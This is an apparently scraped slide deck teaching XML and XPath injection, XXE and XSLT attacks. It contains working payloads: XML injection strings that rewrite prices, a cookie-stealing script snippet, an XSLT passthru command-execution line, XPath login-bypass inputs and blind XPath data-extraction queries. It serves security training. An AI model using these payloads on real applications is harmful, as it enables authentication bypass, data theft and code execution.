![XML – CDATA Section
Tells parser not to use markup for characters
in this section
Examples:
<![CDATA[if (c<10)]]>
<![CDATA[<script>alert(1)</script>]>](https://image.slidesharecdn.com/xmlxpathinjectionnew-140908034216-phpapp02/85/XML-XPath-Injections-7-320.jpg)
![XML Injection – CDATA
Payload:
<catalog>
<book id=“101”>
<author>Anonymous</author>
<title>We Are Anonymous</title>
<price><![CDATA[INR 200]]></price>
</book>
</catalog>
INR 200]]></price></book><book id=“102”><author>demo</author>
<title>Demo Demo</title><price><
![XML Injection – CDATA
<catalog>
<book id=“101”>
<author>Anonymous</author>
<title>We Are Anonymous</title>
<price><![CDATA[INR 200]]></price>
</book>
<book id=“102”>
<author>demo</author>
<title>Demo Demo</title>
<price><![CDATA[FREE]]></price>
</book>
</catalog>](https://image.slidesharecdn.com/xmlxpathinjectionnew-140908034216-phpapp02/85/XML-XPath-Injections-14-320.jpg)
![XPath Predicates
Used to find a specific node or a node that
contain specific value.
Always embedded in square brackets.
Expression Result
/Employees/Employee[1] Selects first ‘Employee’ element that is
the child of ‘Employees’ element
/Employees/Employee[last()] Selects last ‘Employee’ element that is
the child of ‘Employees’ element
/Employees/Employee[position()<3] Selects first 2 ‘Employee’ elements that
are children of Employees element
//Employee[@ID=‘1’] Selects all the ‘Employee’ elements that
have an attribute named ‘ID’ with a value
of ‘1’](https://image.slidesharecdn.com/xmlxpathinjectionnew-140908034216-phpapp02/85/XML-XPath-Injections-23-320.jpg)
![XPath Location Path
Syntax:
axisname::nodetest[predicate]
an axis - defines the tree-relationship between the
selected node & the current node
nodetest – identifies node within an axis
Zero or more predicates – further refines the
selected node-set](https://image.slidesharecdn.com/xmlxpathinjectionnew-140908034216-phpapp02/85/XML-XPath-Injections-24-320.jpg)
![XPath Injection
XPath Query:
/Employees/Employee[UserName/text() = ‘user’
and Password/text() = ‘passwd’]/Type/text()](https://image.slidesharecdn.com/xmlxpathinjectionnew-140908034216-phpapp02/85/XML-XPath-Injections-27-320.jpg)
![XPath Injection
No UserName & Password known:
user =’ or ‘1’=‘1
passwd = ’ or ‘1’=‘1
/Employees/Employee[UserName/text() = ‘’ or
‘1’=‘1’ and Password/text() = ‘’ or
‘1’=‘1’]Type/text()](https://image.slidesharecdn.com/xmlxpathinjectionnew-140908034216-phpapp02/85/XML-XPath-Injections-28-320.jpg)
![XPath Injection
UserName known:
user =mbrown’ or ‘1’=‘1
passwd = anything
/Employees/Employee[UserName/text() =
‘mbrown’ or ‘1’=‘1’ and Password/text() =
‘anything’]Type/text()](https://image.slidesharecdn.com/xmlxpathinjectionnew-140908034216-phpapp02/85/XML-XPath-Injections-29-320.jpg)
![XPath Injection
No UserName & Password known &
Password is not vulnerable:
user =’ or ‘1’=‘1’ or ‘1’=‘1
passwd = anything
/Employees/Employee[UserName/text() = ‘’ or
‘1’=‘1’ or ‘1’=‘1’ and Password/text() =
‘anything’]Type/text()](https://image.slidesharecdn.com/xmlxpathinjectionnew-140908034216-phpapp02/85/XML-XPath-Injections-30-320.jpg)
![Blind XPath Injection
XPath Query:
/Employees/Employee[@ID=‘_id_’]
/Employees/Employee[@ID=‘1’ and ‘1’=‘1’]
=>TRUE
/Employees/Employee[@ID=‘1’ and ‘1’=‘2’]
=>FALSE](https://image.slidesharecdn.com/xmlxpathinjectionnew-140908034216-phpapp02/85/XML-XPath-Injections-31-320.jpg)
![Blind XPath Injection
Extracting XML file structure
Get count of all nodes
▪ count(/*/child::*)
Get name of first node
▪ name(/*/child::*[1])
Get count of child nodes of first node
▪ count(/*/child::*[1]/child::*)](https://image.slidesharecdn.com/xmlxpathinjectionnew-140908034216-phpapp02/85/XML-XPath-Injections-32-320.jpg)
![Blind XPath Injection
Extracting XML file structure
Get name of first child node of first node
▪ name(/*/child::*[1]/child::*[1])
Get value of first child node of first node
▪ /*/child::*[1]/child::*[1]/text()
Repeat the process for all child nodes](https://image.slidesharecdn.com/xmlxpathinjectionnew-140908034216-phpapp02/85/XML-XPath-Injections-33-320.jpg)
![Blind XPath Injection
Extracting XML file structure
Check if the first character of value of first child
node of first node is ‘J’
/Employees/Employee[@ID=‘123’ or
substring((/*/child::*[1]/child::*[1]/text()),1,1)=‘J’
]](https://image.slidesharecdn.com/xmlxpathinjectionnew-140908034216-phpapp02/85/XML-XPath-Injections-34-320.jpg)
XML & XPath Injections
- 1. XML & XPath Injection By AMol NAik (@amolnaik4)
- 2. Agenda XML Basic XML Injection XXE Attack XSLT Attacks XPath Basics XPath Injections XPath Tools
- 3. All codes are at: https://bitbucket.org/null0x00/null-humla-xml- injection/ 3
- 4. 4
- 5. XML Basics eXtensible Markup Language Flexible text-based format Presents structured info Used for Data Exchange/Storage
- 6. XML Components Entity Attribute Root Element Node Node Value CDATA Section
- 7. XML – CDATA Section Tells parser not to use markup for characters in this section Examples: <![CDATA[if (c<10)]]> <![CDATA[<script>alert(1)</script>]>
- 8. XML Injections In Node Attribute In Node Value In CDATA Section
- 9. XML Injection – Node Attribute Payload: <catalog> <book id=“101”> <author>Anonymous</author> <title>We Are Anonymous</title> <price>INR 200</price> </book> </catalog> 102”><author>demo</author><title>Demo Demo</title><price>FREE</price></book><book id=“
- 10. XML Injection – Node Attribute <catalog> <book id=“102”> <author>demo</author> <title>Demo Demo</title> <price>FREE</price> </book> <book id=“101”> <author>Anonymous</author> <title>We Are Anonymous</title> <price>INR 200</price> </book> </catalog>
- 11. XML Injection – Node Value Payload: <catalog> <book id=“101”> <author>Anonymous</author> <title>We Are Anonymous</title> <price>INR 200</price> </book> </catalog> Anonymous</author><title>Demo Demo</title><price>FREE</price> </book><book id=“102”><author>
- 12. XML Injection – Node Value <catalog> <book id=“101”> <author>Anonymous</author> <title>Demo Demo</title> <price>FREE</price> </book> <book id=“102”> <author>demo</author> <title>We Are Anonymous</title> <price>INR 200</price> </book> </catalog>
- 13. XML Injection – CDATA Payload: <catalog> <book id=“101”> <author>Anonymous</author> <title>We Are Anonymous</title> <price><![CDATA[INR 200]]></price> </book> </catalog> INR 200]]></price></book><book id=“102”><author>demo</author> <title>Demo Demo</title><price><![CDATA[
- 14. XML Injection – CDATA <catalog> <book id=“101”> <author>Anonymous</author> <title>We Are Anonymous</title> <price><![CDATA[INR 200]]></price> </book> <book id=“102”> <author>demo</author> <title>Demo Demo</title> <price><![CDATA[FREE]]></price> </book> </catalog>
- 15. XML Entity Variable Define Shortcuts Standard Text Special Characters Can be Internal/External
- 16. XML Entity
- 17. XXE Attack
- 18. XSLT Extensible Stylesheet Language Transformations Used for the transformation of XML documents See this as CSS of XML
- 19. XSLT
- 20. XSLT Injection XSS <script>alert(document.cookie)</script> Code Execution <xsl:value-of select="php:function('passthru','ls -la /')"/>
- 21. XPath Basics Language to select XML Nodes Formats XML data as tree-structured values Similar as SQL (in some sense)
- 22. XPath Syntax Uses path expressions to select nodes or node-sets in an xml document Expression Description nodename Selects all child nodes of the named node / Selects from root node // Selects nodes from the current node that match the selection no matter where they are . Selects current node .. Selects parent of the current node
- 23. XPath Predicates Used to find a specific node or a node that contain specific value. Always embedded in square brackets. Expression Result /Employees/Employee[1] Selects first ‘Employee’ element that is the child of ‘Employees’ element /Employees/Employee[last()] Selects last ‘Employee’ element that is the child of ‘Employees’ element /Employees/Employee[position()<3] Selects first 2 ‘Employee’ elements that are children of Employees element //Employee[@ID=‘1’] Selects all the ‘Employee’ elements that have an attribute named ‘ID’ with a value of ‘1’
- 24. XPath Location Path Syntax: axisname::nodetest[predicate] an axis - defines the tree-relationship between the selected node & the current node nodetest – identifies node within an axis Zero or more predicates – further refines the selected node-set
- 25. XPath Location Path Example Result child::Employee Selects all ‘Employee’ node that are children of the current node attribute::id Selects the id attribute of the current node child::* Selects all children of the current node attribute::* Selects all attributes of the current node child::text() Selects all text child nodes of the current node child::node() Selects all child nodes of the current node descendant::Employees Selects all ‘Employees’ descendants of the current node
- 26. XPath Functions Function Name Description substring(str,start,len) Return the substring from the start position to the specified length string-length(str) Returns length of the string count(item,item,…) Returns count of the nodes starts-with(str1,str2) Return ‘True’ if str1 starts with str2, else ‘False’ contain(str1,str2) Return ‘True’ if str1 contains str2, else ‘False’ number(arg) Returns numeric value of agrument. Agrument could be boolean, string or node-set string(arg) Returns string value of agrument. Agrument could be boolean, string or node-set
- 27. XPath Injection XPath Query: /Employees/Employee[UserName/text() = ‘user’ and Password/text() = ‘passwd’]/Type/text()
- 28. XPath Injection No UserName & Password known: user =’ or ‘1’=‘1 passwd = ’ or ‘1’=‘1 /Employees/Employee[UserName/text() = ‘’ or ‘1’=‘1’ and Password/text() = ‘’ or ‘1’=‘1’]Type/text()
- 29. XPath Injection UserName known: user =mbrown’ or ‘1’=‘1 passwd = anything /Employees/Employee[UserName/text() = ‘mbrown’ or ‘1’=‘1’ and Password/text() = ‘anything’]Type/text()
- 30. XPath Injection No UserName & Password known & Password is not vulnerable: user =’ or ‘1’=‘1’ or ‘1’=‘1 passwd = anything /Employees/Employee[UserName/text() = ‘’ or ‘1’=‘1’ or ‘1’=‘1’ and Password/text() = ‘anything’]Type/text()
- 31. Blind XPath Injection XPath Query: /Employees/Employee[@ID=‘_id_’] /Employees/Employee[@ID=‘1’ and ‘1’=‘1’] =>TRUE /Employees/Employee[@ID=‘1’ and ‘1’=‘2’] =>FALSE
- 32. Blind XPath Injection Extracting XML file structure Get count of all nodes ▪ count(/*/child::*) Get name of first node ▪ name(/*/child::*[1]) Get count of child nodes of first node ▪ count(/*/child::*[1]/child::*)
- 33. Blind XPath Injection Extracting XML file structure Get name of first child node of first node ▪ name(/*/child::*[1]/child::*[1]) Get value of first child node of first node ▪ /*/child::*[1]/child::*[1]/text() Repeat the process for all child nodes
- 34. Blind XPath Injection Extracting XML file structure Check if the first character of value of first child node of first node is ‘J’ /Employees/Employee[@ID=‘123’ or substring((/*/child::*[1]/child::*[1]/text()),1,1)=‘J’ ]
- 35. XPath Injection Tools XPath Blind Explorer Xcat xmlchor - IronWASP Plugin recon-ng xpath_bruter
- 36. References XPath Injection http://www.slideshare.net/robertosl81/xpath-injection- 3547860 Hacking XPath 2.0 http://www.slideshare.net/michelemanzotti/hacki ng-xpath-20 Blind XPath Injection http://2stop.me/S%C3%A9curit%C3%A9%20Infor matique/Web/EN%20- %20Blind%20Xpath%20injection.pdf
- 37. Thank You !! AMol NAik http://twitter.com/amolnaik4 http://amolnaik4.blogspot.com